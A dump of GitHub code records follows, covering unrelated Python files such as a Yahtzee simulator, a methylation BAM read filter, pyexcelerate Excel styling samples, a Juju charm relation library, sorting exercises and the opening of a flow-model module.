time\n\ndef main():\n x = True\n while x:\n start_time = time.time()\n for x in range(0,1000):\n hand = dieRoll(5)\n hand.sort()\n if isFullHouse(hand):\n print(\"Full House {} - {}\".format(x,hand))\n if isLargeStraight(hand):\n print(\"Large Straight {} - {}\".format(x,hand))\n if isYahtzee(hand):\n print(\"Yahtzee!! {} - {}\".format(x,hand))\n print(\"time={}\".format(time.time()-start_time))\n x = False\n\n\ndef dieRoll(dieCount):\n import random\n if type(dieCount) != int:\n raise TypeError('dieCount must be a positive integer =< 5')\n if dieCount < 1 or dieCount > 5:\n raise ValueError('dieCount must be a positive integer =< 5')\n roll = []\n i=0\n while i < dieCount:\n roll.append(random.randint(1,6))\n i += 1\n return roll\n\ndef isFullHouse(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 2:\n y = next(iter(count_unique))\n if hand.count(y) == 2 or hand.count(y) == 3:\n return True\n return False\n\ndef isLargeStraight(hand):\n if len(hand) != 5:\n return False\n hand.sort()\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 5:\n if hand[4] - hand[0] == 4:\n return True\n return False\n\ndef isYahtzee(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 1:\n return True\n return False\n\ndef isSmallStraight(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) < 4:\n return False\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"djuniversal/Yahtzee","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8915664029","text":"from collections import defaultdict\nimport re\nimport pandas as pd\nimport pysam\n\nREVERSE_READ_MCH_CONTEXT = {'CA', 'CC', 'CT'}\nFORWARD_READ_MCH_CONTEXT = {'AG', 'TG', 'GG'}\n\n\ndef single_read_mch_level(read, nome=False, frac=False):\n \"\"\"\n\n Parameters\n ----------\n read\n nome\n If True, skip all the GpC context as it is subject to methylation\n frac\n\n Returns\n -------\n\n \"\"\"\n # ref seq is parsed based on read seq and MD tag, and do not depend on reverse or not\n ref_seq = read.get_reference_sequence().upper()\n ref_pos = read.get_reference_positions()\n # use dict instead of string is because ref_seq could contain blocks when skip happen\n ref_seq_dict = {pos: base for pos, base in zip(ref_pos, ref_seq)}\n read_seq = read.seq.upper()\n\n # only count mCH\n mch = 0\n cov = 0\n other_snp = 0\n if read.is_reverse: # read in reverse strand\n for read_pos, ref_pos, ref_base in read.get_aligned_pairs(\n matches_only=True, with_seq=True):\n read_base = read_seq[read_pos]\n ref_read_pair = ref_base + read_base\n try:\n ref_context = ref_seq_dict[ref_pos] + ref_seq_dict[ref_pos + 1]\n if nome:\n if ref_seq_dict[ref_pos - 1] == 'G':\n continue\n if ref_context not in REVERSE_READ_MCH_CONTEXT:\n continue\n except KeyError:\n # ref_seq_dict KeyError means position is on border or not continuous, skip that\n continue\n if ref_read_pair == 'CC': # C to C means unconverted and methylated\n cov += 1\n mch += 1\n elif ref_read_pair == 'CT': # C to T means converted and un-methylated\n cov += 1\n else:\n # other kinds of SNPs, do not count to cov\n other_snp += 1\n pass\n else: # read in forward strand\n for read_pos, ref_pos, ref_base in read.get_aligned_pairs(\n matches_only=True, with_seq=True):\n read_base = read_seq[read_pos]\n ref_read_pair = ref_base + read_base\n try:\n ref_context = ref_seq_dict[ref_pos - 1] + ref_seq_dict[ref_pos]\n if nome:\n if ref_seq_dict[ref_pos + 1] == 'C':\n continue\n if ref_context not in FORWARD_READ_MCH_CONTEXT:\n continue\n except KeyError:\n # ref_seq_dict KeyError means position is on border or not continuous, skip that\n continue\n if ref_read_pair == 'GG': # G to G means unconverted and methylated\n cov += 1\n mch += 1\n elif ref_read_pair == 'GA': # G to A means converted and un-methylated\n cov += 1\n else:\n # other kinds of SNPs, do not count to cov\n other_snp += 1\n pass\n if frac:\n return mch, cov, other_snp\n else:\n read_mch_frac = (mch / cov) if cov > 0 else 0\n return read_mch_frac, cov, other_snp\n\n\ndef select_rna_reads_normal(input_bam,\n output_bam,\n mc_rate_min_threshold=0.9,\n cov_min_threshold=3,\n nome=False):\n read_profile_dict = defaultdict(int)\n with pysam.AlignmentFile(input_bam) as bam:\n with pysam.AlignmentFile(output_bam, header=bam.header,\n mode='wb') as out_bam:\n for read in bam:\n read_mch_rate, cov, other_snp = single_read_mch_level(read, nome=nome)\n read_profile_dict[(int(100 * read_mch_rate), cov)] += 1\n\n # split reads\n if (read_mch_rate <\n mc_rate_min_threshold) or (cov < cov_min_threshold):\n continue\n out_bam.write(read)\n\n with open(str(output_bam) + '.reads_profile.csv', 'w') as stat_f:\n stat_f.write('mc_frac,cov,count\\n')\n for (mc_rate, cov), count in read_profile_dict.items():\n stat_f.write(f'{mc_rate},{cov},{count}\\n')\n return\n\n\ndef select_rna_reads_split_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=0.9,\n cov_min_threshold=3,\n nome=False):\n splited_read_name_pattern = re.compile('.+-[lrm]$')\n\n # first pass: determine read methylation level\n read_level_mcs = defaultdict(int)\n read_level_covs = defaultdict(int)\n with pysam.AlignmentFile(input_bam) as f:\n for read in f:\n mc, cov, other_snp = single_read_mch_level(read, frac=True, nome=nome)\n read_name = read.qname\n if splited_read_name_pattern.search(read_name):\n read_level_mcs[read_name[:-2]] += mc\n read_level_covs[read_name[:-2]] += cov\n else:\n read_level_mcs[read_name] += mc\n read_level_covs[read_name] += cov\n read_level_data = pd.DataFrame({\n 'mc': read_level_mcs,\n 'cov': read_level_covs\n })\n read_level_data['mc_frac'] = read_level_data['mc'] / (read_level_data['cov'] +\n 0.001)\n read_level_data['mc_frac'] = (read_level_data['mc_frac'] * 100).astype(int)\n profile = read_level_data.groupby('mc_frac')['cov'].value_counts()\n profile.name = 'count'\n profile = profile.reset_index()\n profile.to_csv(f'{output_bam}.reads_profile.csv', index=None)\n\n # filter reads\n use_reads = read_level_data[\n (read_level_data['mc_frac'] > mc_rate_min_threshold)\n & (read_level_data['cov'] >= cov_min_threshold)].index.tolist()\n use_reads = set(use_reads)\n del read_level_data\n\n # second pass: write passed reads\n with pysam.AlignmentFile(input_bam) as f:\n with pysam.AlignmentFile(output_bam, header=f.header,\n mode='wb') as out_f:\n for read in f:\n read_name = read.qname\n if (read_name in use_reads) or (read_name[:-2] in use_reads):\n # read name or read name without suffix\n out_f.write(read)\n return\n\n\ndef select_rna_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=0.5,\n cov_min_threshold=3,\n nome=False,\n assay_type='mc'):\n if assay_type == 'mc':\n select_rna_reads_normal(input_bam,\n output_bam,\n mc_rate_min_threshold=mc_rate_min_threshold,\n cov_min_threshold=cov_min_threshold,\n nome=nome)\n elif assay_type == 'm3c':\n select_rna_reads_split_reads(input_bam,\n output_bam,\n mc_rate_min_threshold=mc_rate_min_threshold,\n cov_min_threshold=cov_min_threshold,\n nome=nome)\n else:\n raise ValueError(f'Unknown assay_type {assay_type}.')\n return\n","repo_name":"lhqing/cemba_data","sub_path":"cemba_data/mapping/mct/mct_star_bam_filter.py","file_name":"mct_star_bam_filter.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"34"} +{"seq_id":"42182412524","text":"\"\"\"Utilities to run GHub\"\"\"\nfrom .ghubutils import Context, GHub\nfrom .cliutils import Interpreter\nfrom termcolor import colored\nimport colorama\n\nimport os\n\n\ndef run_ghub():\n \"\"\"Run GHub\"\"\"\n colorama.init()\n print(\"Welcome to GHub - Browse GitHub like it is UNIX\")\n print(\"Starting initial setup...\")\n ghub = GHub()\n interpreter = Interpreter()\n print(\"Setup done.\")\n while True:\n print(\n \"ghub:{} {}>\".format(\n colored(ghub.context.context, \"yellow\"),\n colored(ghub.context.location, \"green\"),\n ),\n end=\" \",\n )\n command = input()\n interpreter.execute(command, ghub)\n","repo_name":"anuravi98/ghub","sub_path":"ghub/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11803798675","text":"#! usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nInsertion\n\nThe algorithm that people often use to sort bridge hands is to consider the\ncards one at a time, inserting each into its proper place among those already\nconsidered (keeping them sorted). In a computer implementation, we need to make\nspace for the current item by moving larger items one position to the right,\nbefore inserting the current item into the vacated position.\n\nAverage case performance О(n^2)\n\n插入排序\n通常人们整理桥牌的方法是一张一张的来,将每一张牌插入到其他已经有序的牌中的适当位置。在计算机的实\n现中,为了给更小的元素腾出空间,我们需要将其余所有元素在插入之前都向右移动一位。\n\n时间复杂度 O(n^2)\n\"\"\"\n\ndef insertion(array):\n if len(array) == 1:\n return array\n\n for i in range(1, len(array)):\n insertion = array[i]\n j = i\n\n # check the right position to insert forwardly and move the position of\n # larger item\n while j > 0 and insertion < array[j-1]:\n array[j] = array[j-1]\n j -= 1\n\n # insert the right position\n array[j] = insertion\n\n return array\n\nif __name__ == \"__main__\":\n\n import sys\n sys.path.append('../')\n from generator import *\n\n data = getRandomNumbers(0, 1000, 15)\n print('Insertion Sort')\n print('> input: %s' % data)\n print('> output: %s' % insertion(data))\n","repo_name":"StevenYuysy/algorithms","sub_path":"chapter-2/Insertion.py","file_name":"Insertion.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"16221322144","text":"\"\"\"\n pip install pyexcelerate\n\"\"\"\n\nfrom pyexcelerate import Workbook\nfrom datetime import datetime\n\n\ndef write_bulk_data_cell_by_cell():\n data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] # data is a 2D array\n wb = Workbook()\n wb.new_sheet(\"sheet name\", data=data)\n wb.save(\"write_bulk_data_cell_by_cell.xlsx\")\n\n\ndef write_bulk_data_to_a_range():\n wb = Workbook()\n ws = wb.new_sheet(\"test\")\n ws.range(\"B2\", \"C3\").value = [[1, 2], [3, 4]]\n wb.save(\"write_bulk_data_to_a_range.xlsx\")\n\n\ndef write_cell_data_faster():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 15) # a number\n ws.set_cell_value(1, 2, 20)\n ws.set_cell_value(1, 3, \"=SUM(A1,B1)\") # a formula\n ws.set_cell_value(1, 4, str(datetime.now())) # a date\n wb.save(\"write_cell_data_faster.xlsx\")\n\n\ndef write_cell_data_fast():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 15 # a number\n ws[1][2].value = 20\n ws[1][3].value = \"=SUM(A1,B1)\" # a formula\n ws[1][4].value = str(datetime.now()) # a date\n wb.save(\"write_cell_data_fast.xlsx\")\n\n\ndef select_cell_by_name():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.cell(\"A1\").value = 12\n wb.save(\"select_cell_by_name.xlsx\")\n\n\ndef merge_cell():\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n \n ws[1][1].value = 15\n ws.range(\"A1\", \"B1\").merge()\n\n ws[1][5].value = 15\n ws.range(\"E1\", \"G1\").merge()\n\n ws[3][1].value = 15\n ws.range(\"A3\", \"A4\").merge()\n\n ws[3][5].value = 15\n ws.range(\"E3\", \"E5\").merge()\n\n wb.save(\"merge_cell.xlsx\")\n\n\ndef styling_cell_fastest():\n from pyexcelerate import Workbook, Color, Style, Font, Fill, Format\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 123456)\n ws.set_cell_style(1, 1, Style(font=Font(bold=True)))\n ws.set_cell_style(1, 1, Style(font=Font(italic=True)))\n ws.set_cell_style(1, 1, Style(font=Font(underline=True)))\n ws.set_cell_style(1, 1, Style(font=Font(strikethrough=True)))\n ws.set_cell_style(1, 1, Style(fill=Fill(background=Color(255,228,75,52))))\n\n ws.set_cell_value(1, 2, datetime.now())\n ws.set_cell_style(1, 2, Style(format=Format('mm/dd/yy')))\n\n wb.save(\"styling_cell_fastest.xlsx\")\n\n\ndef styling_cell_faster():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_cell_value(1, 1, 123456)\n ws.get_cell_style(1, 1).font.bold = True\n ws.get_cell_style(1, 1).font.italic = True\n ws.get_cell_style(1, 1).font.underline = True\n ws.get_cell_style(1, 1).font.strikethrough = True\n ws.get_cell_style(1, 1).fill.background = Color(0, 255, 0, 0)\n\n ws.set_cell_value(1, 2, datetime.now())\n ws.get_cell_style(1, 2).format.format = 'mm/dd/yy'\n \n wb.save(\"styling_cell_faster.xlsx\")\n\n\ndef styling_cell_fast():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1][1].style.font.bold = True\n ws[1][1].style.font.italic = True\n ws[1][1].style.font.underline = True\n ws[1][1].style.font.strikethrough = True\n ws[1][1].style.fill.background = Color(0, 255, 0, 0)\n\n ws[1][2].value = datetime.now()\n ws[1][2].style.format.format = 'mm/dd/yy'\n\n wb.save(\"styling_cell_fast.xlsx\")\n\n\ndef styling_ranges():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"test\")\n ws.range(\"A1\",\"C3\").value = 1\n ws.range(\"A1\",\"C1\").style.font.bold = True\n ws.range(\"A2\",\"C3\").style.font.italic = True\n ws.range(\"A3\",\"C3\").style.fill.background = Color(255, 0, 0, 0)\n ws.range(\"C1\",\"C3\").style.font.strikethrough = True\n\n wb.save(\"styling_ranges.xlsx\")\n\n\ndef styling_rows_fastest():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.set_row_style(1, Style(fill=Fill(background=Color(255,0,0,0))))\n wb.save(\"styling_rows_fastest.xlsx\")\n\n\ndef styling_rows_faster():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.get_row_style(1).fill.background = Color(255, 0, 0)\n wb.save(\"styling_rows_faster.xlsx\")\n\ndef styling_rows_fast():\n from pyexcelerate import Workbook, Color\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1].style.fill.background = Color(255, 0, 0)\n wb.save(\"styling_rows_fast.xlsx\")\n\n\ndef styling_columns_fastest():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws.set_col_style(1, Style(fill=Fill(background=Color(255,0,0,0))))\n wb.save(\"styling_columns_fastest.xlsx\")\n\n\ndef row_height_width():\n from pyexcelerate import Workbook, Color, Style, Fill\n from datetime import datetime\n\n wb = Workbook()\n\n ws = wb.new_sheet(\"sheet name 1\")\n \n ws[1][1].value = \"this is long string 1\"\n ws[1][2].value = \"this is long string 2\"\n ws[1][3].value = \"this is long string 3\"\n\n ws.set_col_style(1, Style(size=-1)) # auto-fit column 1\n ws.set_col_style(2, Style(size=0)) # hidden column 2\n ws.set_col_style(3, Style(size=100)) # width=100 column 3\n \n # -----------------\n ws = wb.new_sheet(\"sheet name 2\")\n \n ws[1][1].value = \"this is long string 1\"\n ws[2][1].value = \"this is long string 2\"\n ws[3][1].value = \"this is long string 3\"\n\n ws.set_row_style(1, Style(size=-1)) # auto-fit column 1\n ws.set_row_style(2, Style(size=0)) # hidden column 2\n ws.set_row_style(3, Style(size=100)) # width=100 column 3\n\n wb.save(\"row_height_width.xlsx\")\n\n\ndef styling_available():\n from pyexcelerate import Workbook, Color, Style, Fill, Border\n from datetime import datetime\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = 123456\n ws[1][1].style.font.bold = True\n ws[1][1].style.font.italic = True\n ws[1][1].style.font.underline = True\n ws[1][1].style.font.strikethrough = True\n ws[1][1].style.font.color = Color(255, 0, 255)\n ws[1][1].style.fill.background = Color(0, 255, 0)\n ws[1][1].style.alignment.vertical = 'top'\n ws[1][1].style.alignment.horizontal = 'right'\n ws[1][1].style.alignment.rotation = 90\n ws[1][1].style.alignment.wrap_text = True\n ws[1][1].style.borders.top.color = Color(255, 0, 0)\n ws[1][1].style.borders.right.style = '-.' # available: .-, ..-, --, .., =, ., medium -., medium -.., medium --, /-., _\n\n wb.save(\"styling_available.xlsx\")\n\n\ndef styling_defined_by_objects():\n from pyexcelerate import Workbook, Font, Color, Alignment\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws[1][1].value = datetime.now()\n\n ws[1][1].style.font = Font(bold=True, italic=True, underline=True, strikethrough=True, family=\"Calibri\", size=10, color=Color(255,0,0))\n ws[1][1].style.format.format = 'mm/dd/yy'\n ws[1][1].style.alignment=Alignment(horizontal=\"left\", vertical=\"bottom\", rotation=0, wrap_text=True) #(\"left\", \"center\", \"right\"), \n\n wb.save(\"styling_defined_by_objects.xlsx\")\n\n\n\ndef styling_defined_ALL_style_by_objects():\n from pyexcelerate import Workbook, Style, Font, Color, Fill, Alignment, Borders, Border, Format\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n \n borders = Borders.Borders(\n left=Border.Border(color=Color(255,0,0), style=\"thin\"), \n right=Border.Border(color=Color(255,0,0), style=\"mediumDashDotDot\"), \n top=Border.Border(color=Color(255,0,0), style=\"double\"), \n bottom=Border.Border(color=Color(255,0,0), style=\"slantDashDot\")\n )\n\n ws.cell(\"E11\").value = datetime.now()\n ws.cell(\"E11\").style = Style(\n font=Font(bold=True, italic=True, underline=True, strikethrough=True, family=\"Calibri\", size=20, color=Color(251,240,11)),\n fill=Fill(background= Color(33,133,255)), \n alignment=Alignment(horizontal=\"left\", vertical=\"bottom\", rotation=0, wrap_text=True), #(\"left\", \"center\", \"right\"), \n borders=borders,\n format=Format('mm/dd/yy'), # NOTE: if cell string show ###, then decrease font size or increase col size\n # size=-1 # NOTE: don't work, it must use below with row or column statements\n )\n\n ws.set_col_style(5, Style(size=-1)) # set width of column # E col\n ws.set_row_style(11, Style(size=-1)) # set height of row\n\n wb.save(\"styling_defined_ALL_style_by_objects.xlsx\")\n\n\ndef styling_cell_some_sample_format():\n from pyexcelerate import Workbook, Style\n\n wb = Workbook()\n ws = wb.new_sheet(\"sheet name\")\n ws.set_col_style(5, Style(size=30)) # set width of column # E col\n \n ws.cell(\"E1\").value = datetime.now()\n ws.cell(\"E1\").style.format.format = 'mm/dd/yy hh:MM:ss' # datetime\n\n ws.cell(\"E2\").value = 12345678\n ws.cell(\"E2\").style.format.format = '#,##0' # number : 12,345,678\n\n ws.cell(\"E3\").value = 1234.5678\n ws.cell(\"E3\").style.format.format = '#,##0.00' # float number : 1,234.57\n\n ws.cell(\"E4\").value = 0.12345\n ws.cell(\"E4\").style.format.format = '0.00%' # percentage: 12.35%\n\n wb.save(\"styling_cell_some_sample_format.xlsx\")\n\n\nif __name__ == \"__main__\":\n # write_bulk_data_cell_by_cell()\n # write_bulk_data_to_a_range()\n # write_cell_data_faster()\n # write_cell_data_fast()\n \n # select_cell_by_name()\n # merge_cell()\n\n # styling_cell_fastest()\n # styling_cell_faster()\n # styling_cell_fast()\n styling_cell_some_sample_format()\n\n # styling_ranges()\n\n # styling_rows_fastest()\n # styling_rows_faster()\n # styling_rows_fast()\n\n # styling_columns_fastest()\n\n # styling_available()\n # row_height_width()\n\n # styling_defined_by_objects()\n # styling_defined_ALL_style_by_objects()\n","repo_name":"PhungXuanAnh/python-note","sub_path":"pyexcelerate_sample/pyexcelerate_sample.py","file_name":"pyexcelerate_sample.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"43159458310","text":"\"\"\"TODO: Add a proper docstring here.\n\nThis is a placeholder docstring for this charm library. Docstrings are\npresented on Charmhub and updated whenever you push a new version of the\nlibrary.\n\nComplete documentation about creating and documenting libraries can be found\nin the SDK docs at https://juju.is/docs/sdk/libraries.\n\nSee `charmcraft publish-lib` and `charmcraft fetch-lib` for details of how to\nshare and consume charm libraries. They serve to enhance collaboration\nbetween charmers. Use a charmer's libraries for classes that handle\nintegration with their charm.\n\nBear in mind that new revisions of the different major API versions (v0, v1,\nv2 etc) are maintained independently. You can continue to update v0 and v1\nafter you have pushed v3.\n\nMarkdown is supported, following the CommonMark specification.\n\"\"\"\n\nfrom ops.framework import BoundEvent, EventBase, EventSource, Object, ObjectEvents\nfrom ops.charm import CharmBase\n\nimport logging\n\nLIBID = \"45208406413c4910a95babe7910a6ff9\"\nLIBAPI = 0\nLIBPATCH = 1\n\nDEFAULT_RELATION_NAME = \"dashboard-info\"\n\nlogger = logging.getLogger(__name__)\n\nclass DashboardEntry:\n name: str\n url: str\n icon: str\n\nclass DashboardInfoProvider(Object):\n\n def __init__(\n self, \n charm,\n relation_name: str = DEFAULT_RELATION_NAME, \n entry: DashboardEntry = None\n ):\n super().__init__(charm, relation_name)\n self._charm = charm\n self._relation_name = relation_name\n self._entry = entry\n\n events = self._charm.on[self._relation_name]\n self.framework.observe(events.relation_joined, self._on_relation_changed)\n\n def _on_relation_changed(self, event):\n if not self._charm.unit.is_leader():\n return\n \n if not self._entry:\n return\n \n for relation in self._charm.model.relations[self._relation_name]:\n relation.data[relation.app][\"name\"] = self._entry.name\n relation.data[relation.app][\"url\"] = self.unit_address\n relation.data[relation.app][\"icon\"] = self._entry.icon\n\n @property\n def unit_address(self):\n if self._entry.url:\n return self._entry.url\n \n unit_ip = str(self._charm.model.get_binding(relation).network.bind_address)\n if self._is_valid_unit_address(unit_ip):\n return unit_ip\n \n return socket.getfqdn()\n\n\n\n\nclass EntriesChangedEvent(EventBase):\n \"\"\"Event emitted when dashboard entries change.\"\"\"\n\n def __init__(self, handle, apps):\n super().__init__(handle)\n self.apps = apps\n\n def snapshot(self):\n \"\"\"Save dashboard entries information.\"\"\"\n return {\"apps\": self.apps}\n\n def restore(self, snapshot):\n \"\"\"Restore dashboard entries information.\"\"\"\n self.apps = snapshot[\"apps\"]\n\n\nclass DashboardInfoEvents(ObjectEvents):\n \"\"\"Events raised by `DashboardInfoConsumer`\"\"\"\n\n entries_changed = EventSource(EntriesChangedEvent)\n\nclass DashboardInfoConsumer(Object):\n\n on = DashboardInfoEvents()\n\n def __init__(self, charm: CharmBase, relation_name: str = DEFAULT_RELATION_NAME):\n super().__init__(charm, relation_name)\n self._charm = charm\n self._relation_name = relation_name\n events = self._charm.on[self._relation_name]\n self.framework.observe(events.relation_changed, self._on_relation_changed)\n self.framework.observe(events.relation_joined, self._on_relation_changed)\n self.framework.observe(events.relation_departed, self._on_relation_changed)\n self.framework.observe(events.relation_broken, self._on_relation_changed)\n\n def _on_relation_changed(self, event):\n \n self.on.entries_changed.emit(apps=self.entries)\n\n @property\n def entries(self):\n return [\n {\n \"name\": relation.data[relation.app].get(\"name\", \"\"),\n \"url\": relation.data[relation.app].get(\"url\", \"\"),\n \"icon\": relation.data[relation.app].get(\"icon\", \"\") \n }\n for relation in self._charm.model.relations[self._relation_name]\n ]","repo_name":"simskij/cos-dashboard-k8s-operator","sub_path":"lib/charms/cos_dashboard_k8s/v0/dashboard_info.py","file_name":"dashboard_info.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8494687193","text":"import numpy as np\nimport straxen\n\ndef compute_s1_boundary(parm, area):\n boundary_line = parm[0]*np.exp(-area/parm[1]) + parm[2]\n \n return boundary_line\n\n\ndef data_to_log_decile_log_area_aft(peaklet_data, normalization_factor):\n \"\"\"\n Converts peaklet data into the current best inputs for the SOM, \n log10(deciles) + log10(area) + AFT\n Since we are dealing with logs, anything less than 1 will be set to 1\n \n \"\"\"\n \n # turn deciles into approriate 'normalized' format (maybe also consider L1 normalization of these inputs)\n _,decile_data = compute_wf_and_quantiles(peaklet_data, 10)\n decile_data[decile_data < 1] = 1\n #decile_L1 = np.log10(decile_data)\n decile_log = np.log10(decile_data)\n decile_log_over_max = np.divide(decile_log, normalization_factor[:10])\n \n # Now lets deal with area\n if np.min(peaklet_data['area']) < 0:\n # this might be an issue with the recall function\n # I should also save this value to use\n peaklet_data['area'] = peaklet_data['area']+normalization_factor[11]+1\n elif np.min(peaklet_data['area']) == 1:\n pass # area data is already shifted \n peaklet_log_area = np.log10(peaklet_data['area'])\n \n peaklet_aft = np.sum(peaklet_data['area_per_channel'][:,:straxen.n_top_pmts], axis = 1) / peaklet_data['area']\n peaklet_aft = np.where(peaklet_aft > 0, peaklet_aft, 0)\n peaklet_aft = np.where(peaklet_aft < 1, peaklet_aft, 1)\n \n print(decile_log.shape)\n print((decile_log / normalization_factor[:10]).shape)\n deciles_area_aft = np.concatenate((decile_log_over_max, \n np.reshape(peaklet_log_area, (len(peaklet_log_area),1))/ normalization_factor[10],\n np.reshape(peaklet_aft, (len(peaklet_log_area),1))), axis = 1)\n \n return deciles_area_aft\n\n\ndef compute_wf_and_quantiles(peaks: np.ndarray, bayes_n_nodes: int):\n \"\"\"\n Compute waveforms and quantiles for a given number of nodes(atributes)\n :param peaks:\n :param bayes_n_nodes: number of nodes or atributes\n :return: waveforms and quantiles\n \"\"\"\n waveforms = np.zeros((len(peaks), bayes_n_nodes))\n quantiles = np.zeros((len(peaks), bayes_n_nodes))\n\n num_samples = peaks['data'].shape[1] \n #modified line, original num_samples = peaks['data'].shape[1] \n step_size = int(num_samples/bayes_n_nodes)\n steps = np.arange(0, num_samples+1, step_size)\n\n data = peaks['data'].copy() #data = peaks['data'].copy() \n data[data < 0.0] = 0.0\n for i, p in enumerate(peaks):\n sample_number = np.arange(0, num_samples+1, 1)*p['dt']\n frac_of_cumsum = np.append([0.0], np.cumsum(data[i, :]) / np.sum(data[i, :]))\n cumsum_steps = np.interp(np.linspace(0., 1., bayes_n_nodes, endpoint=False), frac_of_cumsum, sample_number)\n cumsum_steps = np.append(cumsum_steps, sample_number[-1])\n quantiles[i, :] = cumsum_steps[1:] - cumsum_steps[:-1]\n\n for j in range(bayes_n_nodes):\n waveforms[:, j] = np.sum(data[:, steps[j]:steps[j+1]], axis=1)\n waveforms = waveforms/(peaks['dt']*step_size)[:, np.newaxis]\n\n del data\n return waveforms, quantiles\n\ndef compute_AFT(data):\n peaklets_aft = np.sum(data['area_per_channel'][:,:straxen.n_top_pmts], axis = 1) / np.sum(data['area_per_channel'], axis = 1) \n return peaklets_aft","repo_name":"LuisSanchez25/SOM_peaklet_classification_code","sub_path":"Peaklet_cls_functions.py","file_name":"Peaklet_cls_functions.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11615127455","text":"#сортировка\r\n\r\ndef bubble_sort(list):\r\n length = len(list)\r\n for i in range(length):\r\n for j in range(0, length-i-1):\r\n if list[j] > list[j+1]:\r\n temp = list[j]\r\n list[j] = list[j+1]\r\n list[j+1] = temp\r\n\r\nunsorted = [7,1,3,4,2,4,6,5,5]\r\nprint (\"Изначальный список:\")\r\nfor i in range(len(unsorted)):\r\n print (\"% d\" % unsorted[i],end=\" \")\r\nprint (\"\\n\")\r\nbubble_sort(unsorted)\r\n\r\nprint (\"Отсортированный список:\")\r\nfor i in range(len(unsorted)):\r\n print (\"% d\" % unsorted[i],end=\" \")\r\n\r\n#двоичный поиск\r\n\r\ndef binary_search(array, element, start, end):\r\n if start > end:\r\n return -1\r\n\r\n mid = (start + end) // 2\r\n if element == array[mid]:\r\n return mid\r\n\r\n if element < array[mid]:\r\n return binary_search(array, element, start, mid-1)\r\n else:\r\n return binary_search(array, element, mid+1, end)\r\n\r\nprint (\"\\n\")\r\nprint ('Введите искомое число')\r\nmy_element = int(input())\r\nbinary_search(unsorted, my_element, unsorted[0], unsorted[-1])\r\nfor i in range(len(unsorted)):\r\n if my_element==unsorted[i]:\r\n match='MATCH'\r\n else: match='NOT MATCH'\r\nprint (match)\r\n","repo_name":"chtopor/tz","sub_path":"proj1_bubble_sort.py","file_name":"proj1_bubble_sort.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13675812711","text":"def count_divisor(n: int) -> int:\n count = 0\n for i in range(1, n+1):\n if n % i == 0:\n count += 1\n return count\n\n\ndef main() -> None:\n n = int(input())\n\n answer = 0\n for i in range(1, n+1, 2):\n if count_divisor(i) == 8:\n answer += 1\n print(answer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SatoKeiju/AtCoder-Python3","sub_path":"ABC106/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34043518932","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom . import thops\nfrom utils.util import opt_get\nfrom models.modules.Basic import Conv2d, Conv2dZeros, GaussianDiag, DenseBlock, RRDB, FCN\nfrom models.modules.FlowStep import FlowStep\n\nimport functools\nimport models.modules.module_util as mutil\n\n\nclass ConditionalFlow(nn.Module):\n def __init__(self, num_channels, 